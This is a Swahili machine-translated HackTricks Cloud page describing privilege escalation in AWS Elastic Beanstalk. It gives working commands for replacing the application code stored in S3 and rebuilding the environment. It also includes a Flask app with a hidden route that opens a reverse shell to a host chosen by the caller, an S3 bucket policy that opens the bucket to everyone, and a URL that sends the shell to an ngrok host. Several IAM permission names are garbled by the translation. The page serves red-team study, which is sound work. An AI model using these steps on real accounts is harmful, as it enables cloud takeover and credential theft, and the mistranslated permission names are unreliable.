Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - Elastic Beanstalk Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Elastic Beanstalk

Maelezo zaidi kuhusu Elastic Beanstalk katika:

pageAWS - Elastic Beanstalk Enum

Ili kutekeleza vitendo vyenye hisia kwenye Beanstalk utahitaji kuwa na idhini nyingi za hisia katika huduma nyingi tofauti. Unaweza kuchunguza kwa mfano idhini zilizotolewa kwa arn:aws:iam::aws:policy/AdministratorAccess-AWSElasticBeanstalk

elasticbeanstalk:RebuildEnvironment, idhini za kuandika S3 & nyingine nyingi

Kwa idhini za kuandika kwenye kisanduku cha S3 kinachohifadhi mimbo ya mazingira na idhini za kujenga upya maombi (inahitajika elasticbeanstalk:RebuildEnvironment na zingine kadhaa zinazohusiana na S3, EC2 na Cloudformation), unaweza kurekebisha mimbo, kujenga upya programu na wakati ujao unapofikia programu hiyo ita utekeleza kificho chako kipya, ikiruhusu mshambuliaji kudhoofisha programu na sifa za jukumu la IAM ya hiyo.

# Create folder
mkdir elasticbeanstalk-eu-west-1-947247140022
cd elasticbeanstalk-eu-west-1-947247140022
# Download code
aws s3 sync s3://elasticbeanstalk-eu-west-1-947247140022 .
# Change code
unzip 1692777270420-aws-flask-app.zip
zip 1692777270420-aws-flask-app.zip <files to zip>
# Upload code
aws s3 cp 1692777270420-aws-flask-app.zip s3://elasticbeanstalk-eu-west-1-947247140022/1692777270420-aws-flask-app.zip
# Rebuild env
aws elasticbeanstalk rebuild-environment --environment-name "env-name"

elasticbeanstalk:CreateApplication, elasticbeanstalk:CreateEnvironment, elasticbeanstalk:CreateApplicationVersion, elasticbeanstalk:UpdateEnvironment, iam:PassRole, na zaidi...

Zilizotajwa pamoja na idadi kadhaa ya S3, EC2, cloudformation, autoscaling na ruhusa za elasticloadbalancing ni muhimu kwa kujenga mazingira ya Elastic Beanstalk kutoka mwanzo.

  • Unda maombi ya AWS Elastic Beanstalk:

aws elasticbeanstalk create-application --application-name MyApp
aws elasticbeanstalk create-environment --application-name MyApp --environment-name MyEnv --solution-stack-name "64bit Amazon Linux 2 v3.4.2 running Python 3.8" --option-settings Namespace=aws:autoscaling:launchconfiguration,OptionName=IamInstanceProfile,Value=aws-elasticbeanstalk-ec2-role

Ikiwa mazingira tayari yameundwa na hautaki kuunda jipya, unaweza tu kuboresha lile lililopo.

  • Pakia nambari ya programu yako na mahitaji kwenye faili ya ZIP:

zip -r MyApp.zip .

  • Pakia faili ya ZIP kwenye ndoo ya S3:

aws s3 cp MyApp.zip s3://elasticbeanstalk-<region>-<accId>/MyApp.zip

  • Unda toleo la programu ya AWS Elastic Beanstalk:

aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-1.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="MyApp.zip"

  • Sakinisha toleo la programu kwenye mazingira yako ya AWS Elastic Beanstalk:

aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

elasticbeanstalk:UndaMsimboWaMaombi, elasticbeanstalk:SasishaMazingira, cloudformation:PataKigeuzi, cloudformation:ElezaVifaaVyaMstari, cloudformation:ElezaVifaaVyaMstari, autoscaling:ElezaVikundiVyaUkubwa, autoscaling:SitishaMichakato, autoscaling:SitishaMichakato

Kwanza kabisa unahitaji kuunda mazingira halali ya Beanstalk na msimbo ungependa kuendesha kwenye mwendawazimu ukifuata hatua za awali. Kimsingi zipu rahisi inayojumuisha faili hizi 2:

from flask import Flask, request, jsonify
import subprocess,os, socket

application = Flask(__name__)

@application.errorhandler(404)
def page_not_found(e):
return jsonify('404')

@application.route("/")
def index():
return jsonify('Welcome!')


@application.route("/get_shell")
def search():
host=request.args.get('host')
port=request.args.get('port')
if host and port:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,int(port)))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
return jsonify('done')

if __name__=="__main__":
application.run()

Baada ya kuwa na mazingira yako ya Beanstalk yanayoendesha rev shell yako, ni wakati wa kuhamisha kwa mazingira ya waathiriwa. Ili kufanya hivyo, unahitaji kuboresha Sera ya Bucket ya kubeza S3 ya Beanstalk yako ili mwathiriwa aweze kufikia (Tafadhali kumbuka kuwa hii itafungua Bucket kwa KILA MTU):

{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "eb-af163bf3-d27b-4712-b795-d1e33e331ca4",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:GetObject",
"s3:GetObjectVersion",
"s3:*"
],
"Resource": [
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022",
"arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022/*"
]
},
{
"Sid": "eb-58950a8c-feb6-11e2-89e0-0800277d041b",
"Effect": "Deny",
"Principal": {
"AWS": "*"
},
"Action": "s3:DeleteBucket",
"Resource": "arn:aws:s3:::elasticbeanstalk-us-east-1-947247140022"
}
]
}
# Use a new --version-label
# Use the bucket from your own account
aws elasticbeanstalk create-application-version --application-name MyApp --version-label MyApp-2.0 --source-bundle S3Bucket="elasticbeanstalk-<region>-<accId>",S3Key="revshell.zip"

# These step needs the extra permissions
aws elasticbeanstalk update-environment --environment-name MyEnv --version-label MyApp-1.0

# To get your rev shell just access the exposed web URL with params such as:
http://myenv.eba-ankaia7k.us-east-1.elasticbeanstalk.com/get_shell?host=0.tcp.eu.ngrok.io&port=13528
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousAWS - EFS PrivescNextAWS - EMR Privesc

Last updated